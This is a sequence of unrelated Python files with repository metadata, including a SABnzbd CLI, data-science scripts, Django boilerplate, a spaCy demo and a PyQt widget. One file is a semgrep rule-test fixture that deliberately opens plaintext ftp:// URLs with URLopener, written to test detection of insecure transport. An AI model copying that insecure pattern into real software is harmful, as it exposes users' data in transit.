    ''' Command line front end to sabnzbd+.

    Reads server settings from $SABCLICFG (default ~/.nzbrc), parses CLI
    options, then either repeatedly watches a read-only command (-w) or
    runs a single command. NOTE: Python 2 code (print statements).
    '''
    configFile = os.environ.get("SABCLICFG");
    if configFile == None:
        configFile = os.environ['HOME'] + "/.nzbrc"
    commands = None  # NOTE(review): unused variable
    if not os.path.exists(configFile):
        sys.stderr.write('\nUnable to open ' + configFile + '\n\n')
    else:
        config_dict = parse_config(configFile)
        sabnzbd = SABnzbdCore(config_dict)
        # Any non-empty DEBUG env var enables verbose output.
        sabnzbd.debug = os.environ.get("DEBUG");
        if sabnzbd.debug:
            print 'SABnzbd+ CLI ' + VERSION + '\n'
        else:
            print
        command, command_arg = parse_options(sabnzbd, sys.argv[1:])
        sabnzbd.setConnectionVariables()
        if sabnzbd.debug:
            print 'command:' + str(command) + ' - ' + str(command_arg)
        if sabnzbd.watchdelay:
            # Watch mode only makes sense for read-only commands.
            if command not in ('warnings', 'queue', 'details', 'history'):
                print tc.red + tc.bold + 'WARNING:' + tc.end + ' Watch can not be used in conjunction with the "'+ command + '" command.'
                print ' Check help screen for valid watch commands\n'
            else:
                try:
                    sabnzbd.watch(command, command_arg)
                except KeyboardInterrupt:
                    print '\nCatched CTRL-C, exiting watch\n'
                except:
                    # NOTE(review): bare except hides the real error type;
                    # at least the failure is reported before returning.
                    print 'General exception in watch'
        else:
            run_commands(sabnzbd, command, command_arg)
            # After a mutating command, show the refreshed queue.
            if command in ('move', 'addurl', 'addfile', 'addid', 'delete', 'priority', 'resume', 'pause', 'temppause', 'rename', 'postprocessing'):
                run_commands(sabnzbd, 'queue', None)
        if sabnzbd.debug:
            print command + ' -> ' + sabnzbd.command_status

if __name__ == '__main__':
    main()
    sys.exit(0)
|
[
"gh@tobiasussing.dk"
] |
gh@tobiasussing.dk
|
dab6144f837dc47e6411c03a43353b5968913916
|
8659a70b1a210bc0c8eceac7fb6152e42ebec8a2
|
/ch4/bmi/13-bmi-plot.py
|
19d7c858cfdb98a99c331833e33afb18885b6a0f
|
[] |
no_license
|
boossiman2/Python_web
|
49482575a54fc89b430891140bb48245a62af9e4
|
50b40cacff3613c3b413bd25de23ea8be3a70b7e
|
refs/heads/master
| 2018-11-08T03:30:13.606773
| 2018-08-28T12:33:49
| 2018-08-28T12:33:49
| 41,590,382
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 535
|
py
|
import matplotlib.pyplot as plt
import pandas as pd

# Scatter-plot a BMI dataset (weight vs. height), one color per class label.
# Read the CSV with pandas; the third column (the class label) becomes the
# index so rows can be selected per label via tbl.loc[label].
tbl = pd.read_csv("bmi.csv", index_col=2)

# Start drawing the chart: one figure with a single axes.
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)

# Subplot helper - draw all rows carrying the given label in one color.
def scatter(lbl, color):
    b = tbl.loc[lbl]
    ax.scatter(b["weight"],b["height"], c=color, label=lbl)

scatter("fat", "red")
scatter("normal", "yellow")
scatter("thin", "purple")
ax.legend()
plt.savefig("bmi-test.png")
#plt.show()
|
[
"boossiman2@gmail.com"
] |
boossiman2@gmail.com
|
313686d18990a07569702bf878347325817319fe
|
dff4bd6eaa4e157c8bd254f40c7551c6f8ff730e
|
/1st Place/team-member-a-execute-first/coldstart/predict/linear_regression.py
|
2bbd34da5755bac61e9572ee14573958814198c7
|
[] |
no_license
|
gopakumargeetha/power-laws-cold-start
|
9dd5d7c187de13dba2eae34ae667e1f139b37e43
|
3915f29335584e1cadd4fbf95c5265689896f90f
|
refs/heads/master
| 2022-12-19T10:04:48.603324
| 2020-03-14T02:26:06
| 2020-03-14T02:26:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,721
|
py
|
"""
Making predictions using just linear regression.
"""
import numpy as np
from tqdm import tqdm_notebook
from scipy.optimize import minimize
from coldstart.utils import _is_day_off, _get_next_weekday, group_sum, _is_holiday
from coldstart.utils import _get_next_date
class LinearRegression(object):
    """
    Encapsulation of everything needed for making predictions
    using multiple linear regression models.

    One small non-negative linear model is fitted per
    (window, offset, day-off-pattern key) combination, where window is
    'hourly', 'daily' or 'weekly'. Inputs and targets are normalized by the
    target mean before fitting, so the learned weights are scale-free.
    """
    def __init__(self, metadata, use_holidays=True, input_days=7):
        # train_data[window][offset][key] -> {'n', 'x', 'y'} training arrays,
        # plus 'weights' and 'nmae' after fit().
        self.train_data = {
            'hourly': {i:{} for i in range(24)},
            'daily': {i:{} for i in range(7)},
            'weekly': {i:{} for i in range(2)},
        }
        self._metadata = metadata          # forwarded to _is_day_off()
        self._use_holidays = use_holidays  # treat holidays as days off
        self._input_days = input_days      # max history length (days) used as input

    def prepare_data(self, df):
        """Build training sets for all three windows from *df*.

        df is assumed to have series_id, consumption and day-off/holiday
        columns sampled hourly (24 rows per day) — TODO confirm with caller.
        """
        self._prepare_hourly_data(df)
        self._prepare_daily_data(df)
        self._prepare_weekly_data(df)

    def _prepare_hourly_data(self, df):
        # For each sliding window of n_days consecutive days: the first
        # n_days-1 days are features and day n_days is the target; one
        # training sample per hour offset, keyed by the day-off pattern.
        for series_id in tqdm_notebook(df.series_id.unique(), desc='Preparing data'):
            sub_df = df[df.series_id == series_id]
            consumption = sub_df.consumption.values
            is_day_off = self._get_is_day_off_from_df(sub_df)
            for n_days in range(2, 2 + self._input_days):
                for start_idx in range(len(is_day_off)-n_days):
                    key = ''.join([str(i) for i in is_day_off[start_idx:start_idx + n_days]])
                    # x: (24, n_days-1) — same-hour consumption of each input day.
                    x = np.zeros((24, n_days-1))
                    for i in range(n_days -1):
                        x[:, i] = consumption[(start_idx + i)*24:(start_idx + i + 1)*24]
                    val_idx = start_idx + n_days - 1
                    y = consumption[val_idx*24:(val_idx+1)*24]
                    # Normalize both sides by the target-day mean.
                    y_mean = np.mean(y)
                    for offset in range(24):
                        self._add_train_data(x[offset:offset+1]/y_mean, y[offset:offset+1]/y_mean,
                                             'hourly', offset, key)

    def _prepare_daily_data(self, df):
        # Features: daily totals of the input days; target: each of the next
        # 7 daily totals. The key is extended with the target day's
        # day-off flag per offset.
        for series_id in tqdm_notebook(df.series_id.unique(), desc='Preparing data'):
            sub_df = df[df.series_id == series_id]
            consumption = sub_df.consumption.values
            consumption = group_sum(consumption, 24)  # hourly -> daily totals
            is_day_off = self._get_is_day_off_from_df(sub_df)
            for input_days in range(1, 1 + self._input_days):
                for start_idx in range(len(is_day_off)-input_days-7):
                    key = ''.join([str(i) for i in is_day_off[start_idx:start_idx + input_days]])
                    x = consumption[start_idx: start_idx + input_days]
                    x = np.expand_dims(x, axis=0)
                    val_idx = start_idx + input_days
                    y = consumption[val_idx:val_idx + 7]
                    y_mean = np.mean(y)
                    for offset in range(7):
                        final_key = key + str(is_day_off[val_idx + offset])
                        self._add_train_data(x/y_mean, [y[offset]/y_mean], 'daily', offset, final_key)

    def _prepare_weekly_data(self, df):
        # Features: daily totals of the input days; targets: totals of the
        # next two 7-day weeks (offset 0 and 1).
        for series_id in tqdm_notebook(df.series_id.unique(), desc='Preparing data'):
            sub_df = df[df.series_id == series_id]
            consumption = sub_df.consumption.values
            consumption = group_sum(consumption, 24)  # hourly -> daily totals
            is_day_off = self._get_is_day_off_from_df(sub_df)
            for input_days in range(1, 1 + self._input_days):
                for start_idx in range(len(is_day_off)-input_days-14):
                    key = ''.join([str(i) for i in is_day_off[start_idx:start_idx + input_days]])
                    x = consumption[start_idx: start_idx + input_days]
                    x = np.expand_dims(x, axis=0)
                    val_idx = start_idx + input_days
                    y = consumption[val_idx:val_idx + 14]
                    y = group_sum(y, 7)  # daily -> weekly totals (2 values)
                    y_mean = np.mean(y)
                    for offset in range(2):
                        final_key = key
                        self._add_train_data(x/y_mean, [y[offset]/y_mean], 'weekly', offset, final_key)

    def _add_train_data(self, x, y, window, offset, key):
        # Accumulate (x, y) into the bucket for (window, offset, key),
        # concatenating along the sample axis.
        if key in self.train_data[window][offset]:
            self.train_data[window][offset][key] = {
                'n': self.train_data[window][offset][key]['n'] + 1,
                'x': np.concatenate([x, self.train_data[window][offset][key]['x']], axis=0),
                'y': np.concatenate([y, self.train_data[window][offset][key]['y']], axis=0),
            }
        else:
            self.train_data[window][offset][key] = {
                'n': 1,
                'x': x,
                'y': y,
            }

    def fit(self):
        """Fit non-negative weights for every (window, offset, key) bucket
        by minimizing mean absolute error; store 'weights' and 'nmae'."""
        for window in tqdm_notebook(self.train_data, desc='Fitting'):
            for offset in self.train_data[window]:
                iterator = tqdm_notebook(
                    self.train_data[window][offset],
                    leave=False,
                    desc='Fitting window: %s offset: %i' % (window, offset))
                for key in iterator:
                    x = self.train_data[window][offset][key]['x']
                    y = self.train_data[window][offset][key]['y']
                    n_parameters = x.shape[1]
                    # Uniform initial weights; weekly targets are ~7x a
                    # daily input, hence the *7 starting point.
                    if window == 'hourly':
                        x0 = np.ones(n_parameters)/n_parameters
                    elif window == 'daily':
                        x0 = np.ones(n_parameters)/n_parameters
                    elif window == 'weekly':
                        x0 = np.ones(n_parameters)/n_parameters*7
                    output = minimize(
                        _cost_function, x0,
                        args=(x, y),
                        bounds=[(0, np.inf)]*n_parameters)
                    weights = output.x
                    self.train_data[window][offset][key]['weights'] = weights
                    self.train_data[window][offset][key]['nmae'] = _cost_function(
                        weights, x, y
                    )

    def predict(self, window, series_id, consumption, weekdays, dates):
        """Dispatch to the per-window prediction method."""
        if window == 'hourly':
            return self._hourly_predict(series_id, consumption, weekdays, dates)
        elif window == 'daily':
            return self._daily_predict(series_id, consumption, weekdays, dates)
        else:
            return self._weekly_predict(series_id, consumption, weekdays, dates)

    def _hourly_predict(self, series_id, consumption, weekdays, dates):
        """Predict the next day's 24 hourly values from recent history."""
        is_day_off = self._get_is_day_off(weekdays, series_id, dates)
        is_day_off = is_day_off[-self._input_days:]
        # Append the day-off flag of the day being predicted.
        is_day_off.append(self._is_day_off(_get_next_weekday(weekdays[-1]), series_id,
                                           _get_next_date(dates[-1])))
        key = ''.join([str(i) for i in is_day_off])
        # print(key, weekdays)
        # Back off to shorter keys (less history) until a fitted model exists.
        while 1:
            if key in self.train_data['hourly'][0]:
                break
            else:
                # print(key, 'not found')
                key = key[1:]
                if not len(key):
                    raise KeyError('Empty key')
        consumption = consumption[-(len(key)-1)*24:]
        x = np.zeros((24, len(key)-1))
        for i in range(len(key)-1):
            x[:, i] = consumption[i*24:(i + 1)*24]
        pred = []
        for offset in range(24):
            weights = self.train_data['hourly'][offset][key]['weights']
            pred.append(x[offset:offset+1].dot(weights)[0])
        return np.array(pred)

    def _daily_predict(self, series_id, consumption, weekdays, dates):
        """Predict the next 7 daily totals from recent history."""
        is_day_off = self._get_is_day_off(weekdays, series_id, dates)
        is_day_off = is_day_off[-self._input_days:]
        org_key = ''.join([str(i) for i in is_day_off])
        pred = []
        for offset in range(7):
            # Advance to the target day to get its day-off flag.
            weekday = weekdays[-1]
            date = dates[-1]
            for _ in range(offset+1):
                weekday = _get_next_weekday(weekday)
            date = _get_next_date(date, offset+1)
            key = org_key + str(self._is_day_off(weekday, series_id, date))
            # Back off to shorter keys until a fitted model exists.
            while 1:
                if key in self.train_data['daily'][offset]:
                    break
                else:
                    # print(key, 'not found')
                    key = key[1:]
                    if not len(key):
                        msg = 'Key not found: %s\tWindow: %s\tOffset: %s' % (org_key, 'daily', offset)
                        raise KeyError(msg)
            # len(key)-1 input days (the last key char is the target's flag).
            x = consumption[-(len(key)-1)*24:]
            x = group_sum(x, 24)
            x = np.expand_dims(x, axis=0)
            weights = self.train_data['daily'][offset][key]['weights']
            # print(consumption.shape, x.shape, weights.shape, key)
            pred.append(x.dot(weights)[0])
        return np.array(pred)

    def _weekly_predict(self, series_id, consumption, weekdays, dates):
        """Predict the next two weekly totals from recent history."""
        is_day_off = self._get_is_day_off(weekdays, series_id, dates)
        is_day_off = is_day_off[-self._input_days:]
        org_key = ''.join([str(i) for i in is_day_off])
        pred = []
        for offset in range(2):
            key = org_key[:]
            # Back off to shorter keys until a fitted model exists.
            while 1:
                if key in self.train_data['weekly'][offset]:
                    break
                else:
                    # print(key, 'not found')
                    key = key[1:]
                    if not len(key):
                        msg = 'Key not found: %s\tWindow: %s\tOffset: %s' % (org_key, 'weekly', offset)
                        raise KeyError(msg)
            # Weekly keys carry no target flag, so all len(key) days are input.
            x = consumption[-(len(key))*24:]
            x = group_sum(x, 24)
            x = np.expand_dims(x, axis=0)
            weights = self.train_data['weekly'][offset][key]['weights']
            # print(consumption.shape, x.shape, weights.shape, key)
            pred.append(x.dot(weights)[0])
        return np.array(pred)

    def _get_is_day_off(self, weekdays, series_id, dates):
        # weekdays/dates are hourly-resolution sequences; take one sample
        # per day ([::24]) before computing the flags.
        weekdays = weekdays[::24]
        dates = dates[::24]
        is_day_off = [self._is_day_off(weekday, series_id, date) \
                      for weekday, date in zip(weekdays, dates)]
        return is_day_off

    def _is_day_off(self, weekday, series_id, date):
        # A day is "off" if the series' metadata says so, or (optionally)
        # if it is a holiday. Returned as int 0/1 for key-building.
        ret = _is_day_off(series_id, weekday, self._metadata)
        if self._use_holidays:
            ret = ret or _is_holiday(date)
        return int(ret)

    def _get_is_day_off_from_df(self, df):
        # Pick the appropriate per-day flag column, one sample per day.
        if self._use_holidays:
            is_day_off = df.is_holiday.values[::24]
        else:
            is_day_off = df.is_day_off.values[::24]
        is_day_off = [int(value) for value in is_day_off]
        return is_day_off
def _cost_function(params, X, y):
return np.mean(np.abs(y - X.dot(params)))
|
[
"caseyfitz@users.noreply.github.com"
] |
caseyfitz@users.noreply.github.com
|
51ef9ebcaa98ebc7587f1a24b2cf0e33fca79a0f
|
127ed1ba90dcced8cce8366a5139973f1d21c372
|
/python/lang/security/audit/insecure-transport/urllib/insecure-urlopener-open-ftp.py
|
edb25f3b511977c953c437733a648bdd97fd483d
|
[] |
no_license
|
Silentsoul04/semgrep-rules-1
|
f0c53e04b4239555a688bca687340af4736d2514
|
81b81481c0a81e45d3ffba8d60dd98491a1b0446
|
refs/heads/master
| 2022-12-22T15:41:34.399652
| 2020-09-13T14:59:38
| 2020-09-13T14:59:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,388
|
py
|
from urllib.request import URLopener

# NOTE(review): this module is a semgrep rule-test fixture for the
# "insecure-urlopener-open-ftp" rule. The `# ruleid:` / `# ok:` comments are
# assertions consumed by the semgrep test harness, and the insecure ftp://
# URLs are intentional — do NOT "fix" them.

def test1():
    od = URLopener()
    # ruleid: insecure-urlopener-open-ftp
    od.open("ftp://example.com")

def test1_ok():
    od = URLopener()
    # ok: insecure-urlopener-open-ftp
    od.open("ftps://example.com")

def test2():
    od = URLopener()
    # ruleid: insecure-urlopener-open-ftp
    url = "ftp://example.com"
    od.open(url)

def test2_ok():
    od = URLopener()
    # ok: insecure-urlopener-open-ftp
    url = "ftps://example.com"
    od.open(url)

def test3():
    # ruleid: insecure-urlopener-open-ftp
    URLopener().open("ftp://example.com")

def test3_ok():
    # ok: insecure-urlopener-open-ftp
    URLopener().open("ftps://example.com")

def test4():
    # ruleid: insecure-urlopener-open-ftp
    url = "ftp://example.com"
    URLopener().open(url)

def test4_ok():
    # ok: insecure-urlopener-open-ftp
    url = "ftps://example.com"
    URLopener().open(url)

def test5(url = "ftp://example.com"):
    # ruleid: insecure-urlopener-open-ftp
    URLopener().open(url)

def test5_ok(url = "ftps://example.com"):
    # ok: insecure-urlopener-open-ftp
    URLopener().open(url)

def test6(url = "ftp://example.com"):
    od = URLopener()
    # ruleid: insecure-urlopener-open-ftp
    od.open(url)

def test6_ok(url = "ftps://example.com"):
    od = URLopener()
    # ok: insecure-urlopener-open-ftp
    od.open(url)
|
[
"manhnguyen510@gmail.com"
] |
manhnguyen510@gmail.com
|
178b53756b1a7f1ccec51c10e04445888b4f6264
|
6f8e52d3c03d7a4c82a01dbaaca96719d8ad356f
|
/reader/migrations/0002_article_publish_date.py
|
41d8ce661d41cc22b036839a5db6864080b75c60
|
[] |
no_license
|
maest/chwlang
|
5df4c624e4c703192fdea8b03d1448a959d12368
|
72a81a0aba80af6362fe78dcd37ba972e150bf8f
|
refs/heads/master
| 2022-12-16T22:45:40.865007
| 2019-02-25T19:12:07
| 2019-02-25T19:12:07
| 199,169,668
| 0
| 0
| null | 2022-12-08T01:04:54
| 2019-07-27T13:40:39
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 379
|
py
|
# Generated by Django 2.0.2 on 2018-04-15 18:48
from django.db import migrations, models
class Migration(migrations.Migration):
    # Adds the nullable ``publish_date`` timestamp column to reader.Article.
    # Auto-generated by Django; must stay consistent with the migration
    # history, so avoid hand-editing.

    dependencies = [
        ('reader', '0001_initial'),
    ]

    operations = [
        migrations.AddField(
            model_name='article',
            name='publish_date',
            field=models.DateTimeField(null=True),
        ),
    ]
|
[
"b.panait@gmail.com"
] |
b.panait@gmail.com
|
bd60096a6677e31ccf2f53c0600f73f693a5370f
|
12c43be8658110886f71bd792653c7f2c7d9b016
|
/project/app/apps.py
|
d85135acda52ac4478cffadffcfcb0eeb6b61525
|
[] |
no_license
|
umum253/django-generic-project
|
8caf11e19d31766be0e651d979341591020f763c
|
60042cf8fea5a0b8ca3defe18fb96e0b5044e6fe
|
refs/heads/main
| 2023-06-29T23:49:27.318825
| 2021-08-06T10:53:03
| 2021-08-06T10:53:03
| 393,347,584
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 124
|
py
|
from django.apps import AppConfig
class SampleAppConfig(AppConfig):
    """Django application configuration for the local ``app`` package."""
    name = 'app'
    # Human-readable name shown in the Django admin (Japanese: "application").
    verbose_name = 'アプリ'
|
[
"fkwpostpost@gmail.com"
] |
fkwpostpost@gmail.com
|
eafb0fe40ae0971dfb68a338fa1be014d9acd123
|
80fe30a676bdc36b64eb14f6a751cc2591b9eb5e
|
/Session19_Input_Files_Exceptions/src/m2_console_input.py
|
74c5b56c113dc594384339b0ffe2a713c94a4df0
|
[] |
no_license
|
rhinomikey/Python-Projects
|
46edbd89a954d3f018957e1df37f14cb51c743ad
|
7f5906ce0cde57a5537a3068513575da32b33df5
|
refs/heads/master
| 2021-10-29T15:18:30.952074
| 2021-10-19T21:25:32
| 2021-10-19T21:25:32
| 128,818,749
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,111
|
py
|
"""
This module demonstrates how to INPUT from the CONSOLE:
-- ints (integers)
-- floats (floating point numbers)
-- strings.
Authors: David Mutchler, Valerie Galluzzi, Mark Hays, Amanda Stouder,
their colleagues and Nathan Gupta. January 2016.
""" # DONE: 1. PUT YOUR NAME IN THE ABOVE LINE.
########################################################################
# DONE: 2. Read and run this program. Then do the following problems,
# putting your answers RIGHT HERE IN THIS DOCUMENT.
#
# Write a line of code that would input an INTEGER from the console,
# storing the integer in a variable called 'x'.
# Write your line here: x = int(input('Please input an integer(whole number): ' ))
#
# Write a line of code that would input an FLOAT from the console,
# storing the float in a variable called 'x'.
# Write your line here: x = float(input('Please input a decimal number: '))
#
# Write a line of code that would input an STRING from the console,
# storing the string in a variable called 'x'.
# Write your line here: x = input('Please type any word you choose: ')
#
# What happens if you (the user) enter something OTHER than an integer
# (e.g., you enter 4 3 or five or 4.5 -- try them!)
# when running the input_until_a_SENTINEL_value example?
# Put your answer here: There is an error that is raised.
#
# After you have PUT YOUR ANSWERS IN THIS FILE as described above,
# change the above TODO to DONE.
########################################################################
def main():
    """ Calls the other functions in this module to demo CONSOLE IO:
    string, integer and float input, then sentinel-terminated input. """
    input_a_string()
    input_an_integer()
    input_a_float()
    input_until_a_SENTINEL_value()
########################################################################
# Example: how to INPUT a STRING from the Console.
########################################################################
def input_a_string():
    """Prompt for the user's name on the console and print a greeting."""
    print()
    print('--------------------------------------------------')
    print('Demonstrating CONSOLE INPUT of a STRING:')
    print('--------------------------------------------------')
    # input() always returns a string; no conversion needed.
    name = input('Enter your name: ')
    print('Hi, ' + name + '! ', name, '!. ', name)
    print(' Sorry, I have the hiccups...')
########################################################################
# Example: how to INPUT an INTEGER from the Console.
########################################################################
def input_an_integer():
    """Prompt for an age, show it in months and whether the user can vote."""
    print()
    print('--------------------------------------------------')
    print('Demonstrating CONSOLE INPUT of an INTEGER:')
    print('--------------------------------------------------')
    # int() raises ValueError if the user types anything but an integer.
    age = int(input('How old are you? '))
    print('That is ' + str(age * 12) + ' months!')
    if age >= 18:
        print('You are old enough to vote, nice!')
    else:
        print('You will be able to vote in ' + str(18 - age) + ' years.')
########################################################################
# Example: how to INPUT a FLOAT (floating point number) from the Console
########################################################################
def input_a_float():
    """Prompt for a dollar amount and convert it to pounds of potatoes
    at today's price versus the price in 1900."""
    print()
    print('--------------------------------------------------')
    print('Demonstrating CONSOLE INPUT of a FLOATING POINT number:')
    print('--------------------------------------------------')
    # float() raises ValueError on non-numeric input.
    money = float(input('How much money do you have? '))
    # Prices per 10 pounds: $6.46 today, $0.140 in 1900 (source cited below).
    potatoes_today = round((money / 6.46) * 10)
    potatoes_1900 = round((money / 0.140) * 10)
    print('According to Infoplease')
    print('at http://www.infoplease.com/ipa/A0873707.html')
    f_string1 = ' -- That will buy you {} pounds of potatoes today.'
    f_string2 = ' -- That would buy you {} pounds of potatoes in 1900!'
    print(f_string1.format(potatoes_today))
    print(f_string2.format(potatoes_1900))
########################################################################
# Example: how to INPUT repeatedly until a SENTINEL value is entered.
########################################################################
def input_until_a_SENTINEL_value():
    """Read positive integers until the sentinel -1 is entered,
    counting how many of them are prime."""
    print()
    print('--------------------------------------------------')
    print('Demonstrating CONSOLE INPUT of integers')
    print(' that STOPS when -1 is entered as a SENTINEL value.')
    print('--------------------------------------------------')
    print('I will COUNT how many PRIME numbers you give me.')
    count = 0
    while True:
        # int() raises ValueError on non-integer input (e.g. "4 3" or "4.5").
        n = int(input('Enter a positive integer (-1 to stop): '))
        if n == -1:
            break  # sentinel reached: stop reading
        if is_prime(n):
            count = count + 1
    print('You entered ' + str(count) + ' prime numbers.')
def is_prime(n):
    """ Returns True if n is prime, else returns False.

    BUG FIX: the original returned True for every n < 2 (0, 1 and all
    negatives), none of which are prime; those are now rejected up front.
    """
    if n < 2:
        return False
    for k in range(2, (n // 2) + 1):
        if n % k == 0:
            return False
    return True
# ----------------------------------------------------------------------
# Calls main to start the ball rolling.
# ----------------------------------------------------------------------
main()
|
[
"nmhuntemann@gmail.com"
] |
nmhuntemann@gmail.com
|
765bf9d191e29765530286712a31e9a39e6d6c5b
|
943d7ded0e464e3c3a4475c269eccde305865cf2
|
/natural_language_processing/Lemmatization.py
|
bfa9f27e3706ca4ce2e49bce557898592143df35
|
[] |
no_license
|
markikojr/DataScience
|
ab2d8af362012cf2985ce2c51d618605fd0f9223
|
40e1559ae511dfe8141bbfb17719aea099069b4a
|
refs/heads/master
| 2022-12-14T22:33:06.587191
| 2019-11-25T20:03:27
| 2019-11-25T20:03:27
| 200,712,164
| 1
| 0
| null | 2022-12-08T05:20:21
| 2019-08-05T18:56:22
|
Roff
|
UTF-8
|
Python
| false
| false
| 1,356
|
py
|
'''
This program shows some basics about Lemmatization using spacy library:
tokenization, part-of-speech tagging and lemma lookup on a few sample
sentences.
'''
# Perform standard imports:
import spacy
# Load the small English pipeline (must be installed separately).
nlp = spacy.load('en_core_web_sm')

print("---------- Create doc1 and apply tokenization, Part-or-speech tag and lemmatization:", "\n")
# Creating doc1
doc1 = nlp(u"I am a runner running in a race because I love to run since I ran today")
# Apply tokenization, Part-or-speech tag and lemmatization
# (token.lemma is the integer hash; token.lemma_ is the string form)
for token in doc1:
    print(token.text, '\t', token.pos_, '\t', token.lemma, '\t', token.lemma_)

print("---------- Define function to apply tokenization, Part-or-speech tag and lemmatization and better display:", "\n")
# Defining function to apply tokenization, Part-or-speech tag and lemmatization and better display
def show_lemmas(text):
    # Fixed-width columns: text, POS tag, lemma hash, lemma string.
    for token in text:
        print(f'{token.text:{12}} {token.pos_:{6}} {token.lemma:<{22}} {token.lemma_}')

print("---------- Create doc2 and apply function:", "\n")
# Create doc2 and apply function
doc2 = nlp(u"I saw eighteen mice today!")
show_lemmas(doc2)

print("---------- Create doc3 and apply function:", "\n")
# Create doc3 and apply function
doc3 = nlp(u"I am meeting him tomorrow at the meeting.")
show_lemmas(doc3)

print("---------- Create doc4 and apply function:", "\n")
# Create doc4 and apply function
doc4 = nlp(u"That's an enormous automobile")
show_lemmas(doc4)
|
[
"marcoscmartinsjr@gmail.com"
] |
marcoscmartinsjr@gmail.com
|
22ace41fc6d9774b05648c5ecdfc968f4e0cff95
|
c3fd71a80fadbf2b567911b2fd3aa2e16f6e5a39
|
/jpl/cli/config.py
|
416b87bb9928be54d40bddbd87ae709928795d04
|
[
"MIT"
] |
permissive
|
thejig/jpl
|
ae88037e82d414eb096282421d9b5e5231072ae7
|
be58184e29588f01e494f218354791516d481f3b
|
refs/heads/master
| 2021-01-05T06:23:48.639782
| 2020-06-12T02:18:17
| 2020-06-12T02:18:17
| 240,913,777
| 0
| 1
|
MIT
| 2020-02-28T01:08:52
| 2020-02-16T15:19:46
|
Python
|
UTF-8
|
Python
| false
| false
| 170
|
py
|
"""Configuration for CLI."""
################
# CLICK COLORS #
################
MARK_TO_COLOR = {
"PASSED": "green",
"WARNING": "yellow",
"FAILED": "red"
}
|
[
"leonkozlowski@gmail.com"
] |
leonkozlowski@gmail.com
|
b8930744c4984b31348d1c800cd832c48d9884c9
|
9a42f514882b7c2ae8e444ef8aa7ff9ed0a33b22
|
/src/metrics.py
|
199d83ebc298db78f56e93abfccd5fa0fea390b3
|
[] |
no_license
|
gusriobr/crop_seq_prediction
|
aa2809d11d73a6c4d278245fd4f5f4444f23139b
|
01721b5ff826322723bc8b5ea0ef696b12dfdb07
|
refs/heads/master
| 2023-01-23T22:21:57.800323
| 2020-12-10T11:21:37
| 2020-12-10T11:21:37
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,047
|
py
|
import tensorflow as tf
import keras.backend as K
def f1(y_true, y_pred):
    """Batch-mean F1 score as a Keras metric.

    Predictions are rounded to hard 0/1 before counting, so this is the
    standard (non-differentiable) F1 — use f1_loss for training.
    Precision/recall are computed per column (axis=0); K.epsilon() guards
    the divisions and NaNs (classes with no positives) are zeroed before
    averaging so empty classes don't poison the mean.
    """
    y_pred = K.round(y_pred)
    tp = K.sum(K.cast(y_true * y_pred, 'float'), axis=0)
    fp = K.sum(K.cast((1 - y_true) * y_pred, 'float'), axis=0)
    fn = K.sum(K.cast(y_true * (1 - y_pred), 'float'), axis=0)
    # (True negatives are not needed for F1; the original computed and
    # discarded them, which has been removed.)

    p = tp / (tp + fp + K.epsilon())
    r = tp / (tp + fn + K.epsilon())

    f1 = 2 * p * r / (p + r + K.epsilon())
    f1 = tf.where(tf.math.is_nan(f1), tf.zeros_like(f1), f1)
    return K.mean(f1)
def f1_loss(y_true, y_pred):
    """Soft-F1 loss (1 - mean F1) usable as a Keras training objective.

    Unlike the f1 metric, predictions are NOT rounded: tp/fp/fn are "soft"
    counts, which keeps the expression differentiable for backprop.
    K.epsilon() guards the divisions; NaNs (classes with no positives) are
    zeroed before averaging.
    """
    tp = K.sum(K.cast(y_true * y_pred, 'float'), axis=0)
    fp = K.sum(K.cast((1 - y_true) * y_pred, 'float'), axis=0)
    fn = K.sum(K.cast(y_true * (1 - y_pred), 'float'), axis=0)
    # (True negatives are not needed for F1; the original computed and
    # discarded them, which has been removed.)

    p = tp / (tp + fp + K.epsilon())
    r = tp / (tp + fn + K.epsilon())

    f1 = 2 * p * r / (p + r + K.epsilon())
    f1 = tf.where(tf.math.is_nan(f1), tf.zeros_like(f1), f1)
    return 1 - K.mean(f1)
|
[
"gusriobr@gmail.com"
] |
gusriobr@gmail.com
|
8b459ea6c51590e42fb2bdf49298dcfd689e92d7
|
612e80dad0b13450fd647b18301cfe3b7dc707e3
|
/SALab2/window.py
|
971507b85c93b4f9260fc36895032aa7e453dd5e
|
[] |
no_license
|
ozhenchuk/SysAn
|
a44f60367ca47cd10c84d3d02bcd073f3bf4427e
|
06d290b1e963794e156c8bc5870103062d92f574
|
refs/heads/master
| 2020-04-11T20:46:01.557157
| 2018-12-17T06:03:55
| 2018-12-17T06:03:55
| 161,516,342
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,537
|
py
|
import matplotlib.pylab as plb
import numpy as np
import sys
import time
##import yaml
from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt4agg import NavigationToolbar2QT as NavigationToolbar
import matplotlib.pyplot as plt
from iterator import Iterator
from PyQt4 import QtCore, QtGui
import os
class PlotManager(QtGui.QWidget):
    """Widget embedding a matplotlib figure driven by four explicit buttons.

    The stock NavigationToolbar is created but hidden; its zoom/pan/home
    actions are triggered through dedicated push buttons (labels in
    Ukrainian), plus a button that saves the figure to a timestamped PNG.
    """
    def __init__(self, parent=None):
        super(PlotManager, self).__init__(parent)
        self.figure = plt.figure ()
        self.canvas = FigureCanvas(self.figure)
        self.toolbar = NavigationToolbar(self.canvas, self)
        # Hidden: its actions are reached via the buttons below instead.
        self.toolbar.hide()
        self.zoombut = QtGui.QPushButton("Збільшити")
        self.zoombut.clicked.connect(self.zoom)
        self.panbut = QtGui.QPushButton("Перемістити")
        self.panbut.clicked.connect(self.pan)
        self.homebut = QtGui.QPushButton("Повністю")
        self.homebut.clicked.connect(self.home)
        self.savebut = QtGui.QPushButton("Зберегти")
        self.savebut.clicked.connect(self.save)
        # Buttons in a row on top, then the (hidden) toolbar and canvas.
        layout = QtGui.QVBoxLayout()
        buttonbox = QtGui.QHBoxLayout()
        buttonbox.addWidget(self.zoombut)
        buttonbox.addWidget(self.panbut)
